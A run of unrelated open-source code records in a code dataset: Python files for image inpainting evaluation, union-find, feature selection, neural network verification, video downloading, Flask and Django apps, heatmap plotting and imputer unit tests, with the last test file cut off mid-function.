CAMs=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n masks=CAMs\n #print(len(masks),masks[0].shape)\n masks_tensor = torch.stack(masks, dim=0)\n Xt_masks = masks_tensor.reshape(4,5,4,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(4,5,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,4,1,1,1) \n Xt_img_gray_repeat=Xt_img_gray.reshape(4,5,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,4,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n edges=[]\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n #print(mask_numpy.shape,Xt_img_gray_numpy.shape)\n Xt_img_gray_numpy=np.uint8(Xt_img_gray.numpy()*255)\n #print(Xt_img_gray_numpy.shape)\n for i in range(4):\n for j in range(5):\n for k in range(4):\n edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], 
mask_numpy[i,j,k,0]))\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(80,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(80,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n inpaint_img_np=(inpaint_img_np-mean)/std\n inpaint_tensor=torch.from_numpy(inpaint_img_np).cuda().reshape(4,5,4,3,84,84).float()\n images_train=torch.cat((images_train, inpaint_tensor), 2).reshape(4,25,3,84,84)\n cls_scores = model(images_train, images_test, labels_train_1hot_4, labels_test_1hot)\n cls_scores = cls_scores.view(batch_size * num_test_examples, -1)\n labels_test = labels_test.view(batch_size * num_test_examples)\n\n _, preds = torch.max(cls_scores.detach().cpu(), 1)\n acc = (torch.sum(preds == labels_test.detach().cpu()).float()) / labels_test.size(0)\n accs.update(acc.item(), labels_test.size(0))\n\n gt = (preds == labels_test.detach().cpu()).float()\n gt = gt.view(batch_size, num_test_examples).numpy() #[b, n]\n acc = np.sum(gt, 1) / num_test_examples\n acc = np.reshape(acc, (batch_size))\n test_accuracies.append(acc)\n\n accuracy = accs.avg\n test_accuracies = np.array(test_accuracies)\n test_accuracies = np.reshape(test_accuracies, -1)\n stds = np.std(test_accuracies, 0)\n ci95 = 1.96 * stds / np.sqrt(args.epoch_size)\n print('Accuracy: {:.2%}, std: {:.2%}'.format(accuracy, ci95))\n\n return accuracy\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"create_pureinpainting_data.py","file_name":"create_pureinpainting_data.py","file_ext":"py","file_size_in_byte":29927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238618375","text":"class unionFind:\n '''\n Union-find set: a tree structure simulated with an array, used for dynamic connectivity problems\n '''\n def __init__(self, n):\n '''\n Initialize the union-find set; n is the number of nodes\n '''\n self.count = n # number of connected components\n self.parent = [i for i in range(n)] # array-simulated tree, storing the parent of each node\n self.size = [1 for _ in range(n)] # size of the tree rooted at each node, used to balance the tree\n \n def find(self, p):\n '''\n Find the root node of node p\n '''\n while self.parent[p] != p:\n # compress the path along the way\n self.parent[p] = self.parent[self.parent[p]]\n p = self.parent[p]\n return p\n\n def union(self, p, q):\n '''\n Connect nodes p and q\n '''\n rootP = self.find(p)\n rootQ = self.find(q)\n if rootP == rootQ:\n # p and q share the same root, so they are already connected; nothing to do\n return\n \n # to keep the tree balanced, merge the smaller tree under the larger one\n if self.size[rootP] >= self.size[rootQ]:\n self.parent[rootQ] = rootP\n self.size[rootP] += self.size[rootQ]\n else:\n self.parent[rootP] = rootQ\n self.size[rootQ] += self.size[rootP]\n \n self.count -= 1\n \n def connected(self, p, q):\n '''\n Check whether nodes p and q are connected\n '''\n return self.find(p) == self.find(q)\n \n def getCount(self):\n '''\n Return the number of connected components\n '''\n return self.count\n\n\nif __name__ == \"__main__\":\n uf = unionFind(10)\n print(uf.getCount())\n\n uf.union(0, 3)\n uf.union(1, 3)\n print(uf.connected(0, 3), uf.getCount(), uf.connected(0, 9))","sub_path":"union_find/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"294333544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 30 23:08:11 2020\n\n@author: kleber\n\"\"\"\n\n\n\nusuario = input(\"Enter the system user: \")\n\nif(usuario == \"Flavio\"):{\n print(\"Welcome Flavio!\")\n }\nelif(usuario == \"Douglas\"):{\n print(\"Welcome Douglas\")\n }\nelif(usuario == \"Nico\"):{\n print(\"Welcome 
Nico\")\n }\nelse:\n print(\"User not found!\")","sub_path":"testeAdv.py","file_name":"testeAdv.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126773048","text":"from sklearn.linear_model import RandomizedLogisticRegression\r\nfrom sklearn.feature_selection import VarianceThreshold, chi2, f_classif\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom minepy import MINE\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\ndef make_df(train_set):\r\n train_features = []\r\n c = []\r\n for img_ki67 in train_set:\r\n feature = img_ki67.get_vgg_feature()\r\n categry = img_ki67.get_class()\r\n c.append([categry])\r\n train_features.append(feature)\r\n feature_len = train_features[0].size\r\n df_names = []\r\n for i in range(feature_len):\r\n df_names.append(\"%d\" % i)\r\n features_df = pd.DataFrame(data=train_features, columns=df_names)\r\n c = np.array(c)\r\n return features_df, c\r\n\r\n\r\ndef remove_low_var(train_x, threshold=1e-4):\r\n '''\r\n\r\n :param train_x: numpy array of shape [n_samples, n_features]\r\n :param threshold: variance\r\n :return: high variance feature indices, variances\r\n '''\r\n vt = VarianceThreshold(threshold=threshold)\r\n high_var_x = vt.fit_transform(train_x)\r\n supports = vt.get_support(indices=True).tolist()\r\n return supports, high_var_x\r\n\r\n\r\ndef pearson(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix} shape = [n_samples, n_features]\r\n :param train_y: array of shape(n_samples)\r\n :return: F : array, shape = [n_features,]\r\n pval : array, shape = [n_features,]\r\n '''\r\n\r\n F, pval = f_classif(train_x, train_y)\r\n print(F)\r\n print(pval)\r\n\r\n\r\ndef chi2_test(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix}, shape = (n_samples, n_features_in)\r\n :param train_y: array-like, shape = (n_samples,)\r\n :return: chi2 : array, shape = (n_features,)\r\n pval : array, shape = (n_features,)\r\n '''\r\n\r\n c, pval = chi2(train_x, train_y)\r\n print(c)\r\n\r\n\r\ndef mic(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix}, shape = (n_samples, n_features)\r\n :param train_y: array-like, shape = (n_samples,)\r\n :return: mic: float\r\n '''\r\n m = MINE()\r\n scores = []\r\n for i in range(train_x.shape[1]):\r\n m.compute_score(train_x[:, i], train_y[:, 0])\r\n score = m.mic()\r\n scores.append((i, score))\r\n return scores\r\n\r\n\r\ndef rf_selection(train_x, train_y, num_trees, depth):\r\n rf = RandomForestClassifier(n_estimators=num_trees, criterion=\"entropy\", max_depth=depth)\r\n rf.fit(train_x,train_y)\r\n print(rf.feature_importances_)\r\n\r\n\r\ndef stability(train_x, train_y, C=1, n_resampling=200, selection_threshold=0.15):\r\n rlog = RandomizedLogisticRegression(C=C, n_resampling=n_resampling, selection_threshold=selection_threshold)\r\n rlog.fit(train_x, train_y[:, 0])\r\n return rlog.scores_\r\n\r\n\r\ndef feature_selection(features, target, feature_num=400, threshold=1e-4, C=1, n_resampling=200,\r\n selection_threshold=0.15):\r\n # high_var_indices, _ = remove_low_var(features.values, threshold=threshold)\r\n # features_high_var = features.ix[:, high_var_indices]\r\n mic_scores = mic(features.values, target)\r\n mic_scores.sort(key=lambda score: score[1], reverse=True)\r\n mic_indices = []\r\n for i in range(feature_num):\r\n mic_indices.append(mic_scores[i][0])\r\n features_mic = features.ix[:, mic_indices]\r\n # rlog_scores = 
stability(features_mic.values, target, C=C, n_resampling=n_resampling,\r\n # selection_threshold=selection_threshold)\r\n # rlog_indices = []\r\n # for i, score in enumerate(rlog_scores):\r\n # if score != 0:\r\n # rlog_indices.append(i)\r\n # features_rlog = features_mic.ix[:, rlog_indices]\r\n # features_result = [int(x) for x in features_rlog.columns.tolist()]\r\n features_result = [int(x) for x in features_mic.columns.tolist()]\r\n return features_result\r\n","sub_path":"utils/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"574579083","text":"#!/usr/bin/env python\nimport argparse\n\nfrom plnn.relu_branch_and_bound import relu_bab\nfrom plnn.network_linear_approximation import AssumptionLinearizedNetwork\nfrom plnn.model import load_and_simplify\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Read a .rlv file \"\n \"and prove its property.\")\n parser.add_argument('rlv_infile', type=argparse.FileType('r'),\n help='.rlv file to prove.')\n args = parser.parse_args()\n\n network, domain = load_and_simplify(args.rlv_infile,\n AssumptionLinearizedNetwork)\n\n epsilon = 0\n decision_bound = 0\n min_lb, min_ub, ub_point, nb_visited_states = relu_bab(network, domain,\n epsilon, decision_bound)\n\n if min_lb >= 0:\n print(\"UNSAT\")\n elif min_ub < 0:\n # Verify that it is a valid solution\n candidate_ctx = ub_point.view(1,-1)\n val = network.net(candidate_ctx)\n margin = val.squeeze().item()\n if margin > 0:\n print(\"Error\")\n else:\n print(\"SAT\")\n print(ub_point)\n print(margin)\n else:\n print(\"Unknown\")\n print(f\"Nb states visited: {nb_visited_states}\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/relubab_runner.py","file_name":"relubab_runner.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"164053243","text":"'''\nDownload Bilibili videos with you-get\nFirst, use the Firefox browser to get the json file for each page, which contains the detailed url of every video:\nhttps://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page=2&single_column=0&callback=__jp0\nThe last parameter is unused, so drop it:\nhttps://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page=2&single_column=0\n'''\nimport requests\nimport os\n\ndef get_json(page):\n url = \"https://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page={}&single_column=0\".format(page)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36,h\"\n }\n rsp = requests.get(url=url, headers=headers)\n # rsp.encoding = rsp.apparent_encoding\n datas = rsp.json()\n dt = []\n for data in datas[\"data\"][\"result\"]:\n dt.append((data[\"title\"], data[\"arcurl\"]))\n # print(dt)\n return dt\ndef down_load(data):\n path = r\"G:\\\\Git_Repository\\\\spider\\\\习题班\\\\数据存储\\\\bili_video\"\n if not os.path.exists(path):\n os.mkdir(path)\n for title, url in data:\n filename = path + \"\\\\\" + title\n print(\"Downloading {}\".format(title))\n os.system(\"you-get -o {} {}\".format(filename, url))\n 
print(\"Finished downloading {}\".format(title))\n\nif __name__ == '__main__':\n for page in range(1,2):\n data = get_json(page)\n down_load(data)","sub_path":"xitiban/数据存储/bilibili_you_get.py","file_name":"bilibili_you_get.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"609039739","text":"\"\"\"Testing resources.\"\"\"\nfrom unittest import main\n\nfrom flask_testing import TestCase\n\nfrom fields_service import APP\nfrom fields_service.config.test_config import TestingConfig\nfrom fields_service.db import DB\nfrom fields_service.models.choice import Choice\nfrom fields_service.models.field import Field\n\n\ndef create_app(config_obj):\n \"\"\"\n Creates testing app.\n :param config_obj: object with configuration.\n :return: flask app.\n \"\"\"\n app = APP\n app.config.from_object(config_obj)\n return app\n\n\nclass MyTestCase(TestCase):\n\n \"\"\"Tests for get, put, delete resources.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables and puts objects into database.\"\"\"\n DB.create_all()\n field = Field(has_autocomplete=True, has_choice=True,\n title=\"edu\", is_multichoice=True)\n DB.session.add(field)\n DB.session.commit()\n field = Field.query.filter_by(has_autocomplete=True, has_choice=True,\n title=\"edu\", is_multichoice=True).first()\n self.field_id = field.id\n choice1 = Choice(title=\"LNU\", field_id=self.field_id)\n choice2 = Choice(title=\"LP\", field_id=self.field_id)\n DB.session.add(choice1)\n DB.session.add(choice2)\n DB.session.commit()\n id1 = Choice.query.filter_by(field_id=self.field_id, title=\"LNU\").first()\n self.choice_id1 = id1.id\n id2 = Choice.query.filter_by(field_id=self.field_id, title=\"LP\").first()\n self.choice_id2 = id2.id\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n def test_get(self):\n \"\"\"Tests get resource.\"\"\"\n with self.create_app().test_client() as client:\n response = client.get('/field/{}'.format(self.field_id))\n check = {\n \"has_autocomplete\": True,\n \"has_choice\": True,\n \"title\": \"edu\",\n \"is_multichoice\": True,\n \"id\": self.field_id,\n \"choices\": [\n {\n \"id\": self.choice_id1,\n \"title\": \"LNU\",\n \"field_id\": self.field_id\n },\n {\n \"id\": self.choice_id2,\n \"title\": \"LP\",\n \"field_id\": self.field_id\n }\n ]\n }\n self.assertEqual(response.json, check)\n\n def test_put(self):\n \"\"\"Tests put resource.\"\"\"\n with self.create_app().test_client() as client:\n new = {\n \"has_autocomplete\": True,\n \"has_choice\": True,\n \"title\": \"edu\",\n \"is_multichoice\": False,\n \"choices\": [\n {\n \"title\": \"LNU\"\n },\n {\n \"title\": \"LP\"\n }\n ]\n }\n client.put('/field/{}'.format(self.field_id), json=new)\n field = Field.query.filter_by(id=self.field_id).first()\n self.assertEqual(field.is_multichoice, False)\n\n def test_delete(self):\n \"\"\"Tests delete resource.\"\"\"\n with self.create_app().test_client() as client:\n response = client.delete('/field/{}'.format(self.field_id))\n field = Field.query.filter_by(id=self.field_id).first()\n choice1 = Choice.query.filter_by(id=self.choice_id1).first()\n choice2 = Choice.query.filter_by(id=self.choice_id2).first()\n self.assertEqual(field, None)\n self.assertEqual(choice1, None)\n self.assertEqual(choice2, None)\n self.assertEqual(response.status_code, 200)\n\n\nclass PostTest(TestCase):\n\n \"\"\"Tests for post 
resource.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables.\"\"\"\n DB.create_all()\n\n def test_post_success(self):\n \"\"\"Tests post resource success.\"\"\"\n with self.create_app().test_client() as client:\n response = client.post('/field',\n json={\"has_autocomplete\": True, \"has_choice\": False,\n \"title\": \"edu\", \"is_multichoice\": True})\n self.assertEqual(response.status_code, 200)\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n\nclass GetTitlesTest(TestCase):\n\n \"\"\"Tests for post resource.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables.\"\"\"\n DB.create_all()\n field1 = Field(has_autocomplete=True, has_choice=False,\n title=\"edu\", is_multichoice=True)\n field2 = Field(has_autocomplete=True, has_choice=False,\n title=\"name\", is_multichoice=True)\n DB.session.add(field1)\n DB.session.add(field2)\n DB.session.commit()\n\n def test_get(self):\n \"\"\"Tests PostAPI get method.\"\"\"\n with self.create_app().test_client() as client:\n response = client.get('/field?field_id=1&field_id=2',)\n check = {\"1\": \"edu\", \"2\": \"name\"}\n self.assertEqual(response.json, check)\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fields_service/tests/test_flask_app.py","file_name":"test_flask_app.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"264465714","text":"#!/usr/bin/env python \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import DivergingNorm\n\n__aa_seq__ = (\"LRLEVKLGQGCFGEVWMGTWNGTTRVAIKTLKPGTMSPEAFLQEAQVMKKLRHEKLVQLYAVVSEEPIYIVTEYMSKGSLLDFLKGETGKYLRLPQLVDMAAQIASGMAYVERMNYVHRDLRAANILVGENLVCKVADFGLARLIEDNEYTARQGAKFPIKWTAPEAALYGRFTIKSDVWSFGILLTELTTKGRVPYPGMVNREVLDQVERGYRMPCPPECPESLHDLMCQCWRKEPEERPTFEYLQAFL\")\n__cd_pos__ = np.arange(270, 520)\n__aa_key__ = {\n 'His' : 'H',\n 'Lys' : 'K',\n 'Arg' : 'R',\n 'Asp' : 'D',\n 'Glu' : 'E',\n 'Cys' : 'C',\n 'Met' : 'M',\n 'Asn' : 'N',\n 'Gln' : 'Q',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Ala' : 'A',\n 'Ile' : 'I',\n 'Leu' : 'L',\n 'Val' : 'V',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Gly' : 'G',\n 'Pro' : 'P',\n 'Ter' : '*'\n \n}\n__pos_idx_dict__ = dict(zip(__cd_pos__, np.arange(len(__cd_pos__))))\n__aa_idx_dict__ = dict(zip(list(__aa_key__.values()), np.arange(len(__aa_key__))))\n\n\ndef create_variant_index(df):\n \"\"\"\n Create variant index from DataFrame with index in hgvs format.\n \n Args:\n df: DataFrame with index in hgvs format\n Returns:\n variant_index: variant in [1 letter WTAA][position][1 letter MutAA]\n format, maintaining original order (list)\n \n \"\"\"\n \n # Grab original hgvs undex\n variant_index = df.index.tolist()\n \n # Loop through all variants\n for idx, variant in enumerate(variant_index):\n \n # Skip _sy and _wt variants\n if 'p.' 
not in variant:\n continue\n\n # Get WT, mutant identities and position\n wt_aa = variant[2:5]\n pos = variant[5:-3]\n mut_aa = variant[-3:]\n\n # Create shortened form\n variant_shortened = __aa_key__[wt_aa] + str(pos) + __aa_key__[mut_aa]\n\n # Reassign value\n variant_index[idx] = variant_shortened\n \n return(variant_index)\n\n\ndef create_heatmap_arr(scores, variant_index):\n \"\"\"\n Create heatmap from given scores.\n \n Args:\n scores: scores in order of variant_index (np array)\n variant_index: order of variants in the format \n [1 letter WTAA][position][1 letter MutAA] (list)\n Returns:\n heatmap_arr: 2D array where positions=rows, aas=cols\n \n \"\"\"\n \n # Create empty array for storing values\n heatmap_arr = np.empty((len(__pos_idx_dict__), len(__aa_idx_dict__)))\n heatmap_arr[:] = np.nan\n \n # Loop through individual variants\n for variant, score in zip(variant_index, scores):\n\n # Skip \"_wt\" and \"_sy\" rows\n if len(variant) < 5:\n continue\n\n # Collect wt, mutant, and position data from variant_index\n wt_aa = variant[0]\n pos = variant[1:-1]\n mut_aa = variant[-1]\n\n # Assign score to heatmap array\n row_idx = __pos_idx_dict__[int(pos)]\n col_idx = __aa_idx_dict__[mut_aa]\n heatmap_arr[row_idx, col_idx] = score\n \n return(heatmap_arr)\n\n\ndef plot_heatmap(heatmap, title):\n \"\"\"\n Plot heatmap.\n \n Args:\n heatmap: 2D array where positions=rows, aas=cols\n title: title of plot\n Returns:\n fig: matplotlib.pyplot figure object\n ax: matplotlib.pyplot axis object\n\n \"\"\"\n fig, ax = plt.subplots(figsize=(50,300))\n resid_map = plt.imshow(heatmap.T, cmap='bwr', norm=DivergingNorm(0.0))\n\n # Set tick locations\n ax.set_yticks(np.arange(heatmap.shape[1]))\n ax.set_xticks(np.arange(heatmap.shape[0]))\n\n # Set tick labels\n ax.set_yticklabels(__aa_idx_dict__.keys())\n ax.set_xticklabels(__pos_idx_dict__.keys())\n plt.xticks(rotation='vertical')\n \n # Set title\n plt.title(title)\n \n # Show figure\n plt.show()\n \n return(fig, ax)\n\n\ndef heatmap_to_pymol(heatmap):\n \"\"\"Calculate values for PyMOL recoloring.\"\"\"\n \n pymol_vals = np.nanmean(heatmap, axis=1)\n return(pymol_vals)","sub_path":"utils/src_utils.py","file_name":"src_utils.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"258444960","text":"import tornado.web, tornado\n\nclass BaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n user_json = self.get_secure_cookie(\"user\")\n if not user_json: return None\n return tornado.escape.json_decode(user_json)\n\n @property\n def redis(self):\n return self.application._redis\n\n\n _client = False\n\n @property\n def client(self):\n if not self._client:\n self._client = tornado.curl_httpclient.CurlAsyncHTTPClient() \n # import pdb;pdb.set_trace()\n\n return self._client\n\nimport re\n\"\"\"\nIn javascript land we throw out everything that isn't alpha num.. 
makes the\nregex pattern easier\n\"\"\"\nPUNCTUATION_CHARS = \".,;:!?@$%^&*()-<>[]{}\\\\|/'\\\"_#\"\nnopunk = re.compile( r\"[%s]\" % re.escape(PUNCTUATION_CHARS))\nMIN_WORD_LENGTH = 2\n\ndef text2words(text):\n if not text: return []\n text = nopunk.sub(\" \", text) #strip punctuation\n words = [word.lower() for word in text.split() if len(word) >= MIN_WORD_LENGTH]\n return words\n","sub_path":"handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"166372693","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom apps.catalogos.views import *\nfrom apps.catalogos.ajax import eliminar_identificador\n\n\nurlpatterns = [\n #url(r'^tipo/listar', login_required(catalogo_list.as_view()), name='catalogo_listar'),\n url(r'^tipo/listar/', login_required(catalogo_list), name='catalogo_listar'),\n url(r'eliminar_identificador/$', eliminar_identificador, name='eliminar_identificador'),\n url(r'^tipo/nuevo', login_required(catalogo_view), name='catalogo_nuevo'),\n url(r'^tipo/editar/(?P<pk>\d+)/$', login_required(catalogo_update.as_view()), name='catalogo_editar'),\n url(r'^tipo/eliminar/(?P<pk>\d+)/$', login_required(catalogo_delete.as_view()), name='catalogo_eliminar'),\n url(r'^tecnologias/listar', login_required(tecnologia_list), name='tecnologia_listar'),\n url(r'^tecnologias/nuevo', login_required(tecnologia_view), name='tecnologia_nuevo'),\n url(r'^tecnologias/editar/(?P<pk>\d+)/$', login_required(tecnologia_update.as_view()), name='tecnologia_editar'),\n url(r'^tecnologias/eliminar/(?P<pk>\d+)/$', login_required(tecnologia_delete.as_view()), name='tecnologia_eliminar'),\n url(r'^personas/listar', login_required(persona_list), name='persona_listar'),\n url(r'^personas/nuevo', login_required(persona_view), name='persona_nuevo'),\n url(r'^personas/editar/(?P<pk>\d+)/$', login_required(persona_update.as_view()), name='persona_editar'),\n url(r'^personas/eliminar/(?P<pk>\d+)/$', login_required(persona_delete.as_view()), name='persona_eliminar'),\n url(r'^especialidades/listar', login_required(especialidad_list), name='especialidad_listar'),\n url(r'^especialidades/nuevo', login_required(especialidad_view), name='especialidad_nuevo'),\n url(r'^especialidades/editar/(?P<pk>\d+)/$', login_required(especialidad_update.as_view()), name='especialidad_editar'),\n url(r'^especialidades/eliminar/(?P<pk>\d+)/$', login_required(especialidad_delete.as_view()), name='especialidad_eliminar'),\n url(r'^estatus/listar', login_required(estatus_list), name='estatus_listar'),\n url(r'^estatus/nuevo', login_required(estatus_view), name='estatus_nuevo'),\n url(r'^estatus/editar/(?P<pk>\d+)/$', login_required(estatus_update.as_view()), name='estatus_editar'),\n url(r'^estatus/eliminar/(?P<pk>\d+)/$', login_required(estatus_delete.as_view()), name='estatus_eliminar'),\n url(r'^documentos/listar', login_required(documentos_list), name='documentos_listar'),\n url(r'^documentos/nuevo', login_required(documentos_view), name='documentos_nuevo'),\n url(r'^documentos/editar/(?P<pk>\d+)/$', documentos_update, name='documentos_editar'),\n url(r'^documentos/eliminar/(?P<pk>\d+)/$', login_required(documentos_delete.as_view()), name='documentos_eliminar'),\n\n]","sub_path":"apps/catalogos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"652442861","text":"import functools\nimport numpy as np\nimport sys\nimport time\nimport unittest\n\nfrom arch.api import eggroll\nfrom federatedml.feature.instance import Instance\nfrom federatedml.feature.imputer import Imputer\n\nfrom sklearn.preprocessing import StandardScaler as SSL\nclass TestMinMaxScaler(unittest.TestCase):\n def setUp(self):\n local_time = time.localtime(time.time())\n str_time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n \n self.test_data = [\n [ \"0.254879\", \"na\", \"0.209656\", \"NA\",\"-0.441366\", \"Na\",\"-0.485934\", \"nA\",\"-0.287570\",\"-0.733474\"],\n [ \"-1.142928\", \"\",\"-1.166747\",\"-0.923578\", \"0.628230\",\"-1.021418\",\"-1.111867\",\"-0.959523\",\"-0.096672\",\"-0.121683\"],\n [ \"-1.451067\",\"-1.406518\", \"none\",\"-1.092337\", \"None\",\"-1.168557\",\"-1.305831\",\"-1.745063\",\"-0.499499\",\"-0.302893\"],\n [ \"-0.879933\", \"null\",\"-0.877527\",\"-0.780484\",\"-1.037534\",\"-0.483880\",\"-0.555498\",\"-0.768581\", \"0.433960\",\"-0.200928\"],\n [ \"0.426758\", \"0.723479\", \"0.316885\", \"0.287273\", \"1.000835\", \"0.962702\", \"1.077099\", \"1.053586\", \"2.996525\", \"0.961696\"],\n [ \"0.963102\", \"1.467675\", \"0.829202\", \"0.772457\",\"-0.038076\",\"-0.468613\",\"-0.307946\",\"-0.015321\",\"-0.641864\",\"-0.247477\"],\n [ \"-0.662496\", \"0.212149\",\"-0.620475\",\"-0.632995\",\"-0.327392\",\"-0.385278\",\"-0.077665\",\"-0.730362\", \"0.217178\",\"-0.061280\"],\n [ \"-0.453343\",\"-2.147457\",\"-0.473631\",\"-0.483572\", \"0.558093\",\"-0.740244\",\"-0.896170\",\"-0.617229\",\"-0.308601\",\"-0.666975\"],\n [ \"-0.606584\",\"-0.971725\",\"-0.678558\",\"-0.591332\",\"-0.963013\",\"-1.302401\",\"-1.212855\",\"-1.321154\",\"-1.591501\",\"-1.230554\"],\n [ \"-0.583805\",\"-0.193332\",\"-0.633283\",\"-0.560041\",\"-0.349310\",\"-0.519504\",\"-0.610669\",\"-0.929526\",\"-0.196974\",\"-0.151608\"]\n ]\n self.test_instance = []\n for td in self.test_data:\n self.test_instance.append(td)\n self.table_instance = self.data_to_eggroll_table(self.test_instance, str_time)\n \n def print_table(self, table):\n for v in (list(table.collect())):\n print(v[1].features)\n\n def data_to_eggroll_table(self, data, jobid, partition=1, work_mode=0):\n eggroll.init(jobid, mode=work_mode)\n data_table = eggroll.parallelize(data, include_key=False, partition = 10)\n return data_table\n\n def table_to_list(self, table_instance):\n res_list = []\n for k, v in list(table_instance.collect()):\n res_list.append(list(v))\n \n return res_list\n \n def fit_test_data(self, data, fit_values, imputer_value):\n for j in range(len(data)):\n for i in range(len(data[j])):\n if data[j][i].lower() in imputer_value:\n data[j][i] = str(fit_values[i])\n return data\n\n\n def fit_test_data_float(self, data, fit_values, imputer_value):\n for j in range(len(data)):\n for i in range(len(data[j])):\n if data[j][i].lower() in imputer_value:\n data[j][i] = float(fit_values[i])\n data[j][i] = float(data[j][i])\n return data\n\n def test_fit_min(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"min\", output_format = 'str')\n cols_transform_value_ground_true = [-1.451067,-2.147457,-1.166747,-1.092337,-1.037534,-1.302401,-1.305831,-1.745063,-1.591501,-1.230554]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n 
self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_max(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"max\", output_format = 'str')\n cols_transform_value_ground_true = [0.963102,1.467675,0.829202,0.772457,1.000835,0.962702,1.077099,1.053586,2.996525,0.961696]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_mean(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"mean\", output_format = 'str')\n cols_transform_value_ground_true = [-0.413542, -0.330818, -0.343831, -0.444957, -0.107726, -0.569688, -0.548734, -0.670353, 0.002498, -0.275518]\n imputer_value = [ '', 'none', 'na', 'null' ] \n 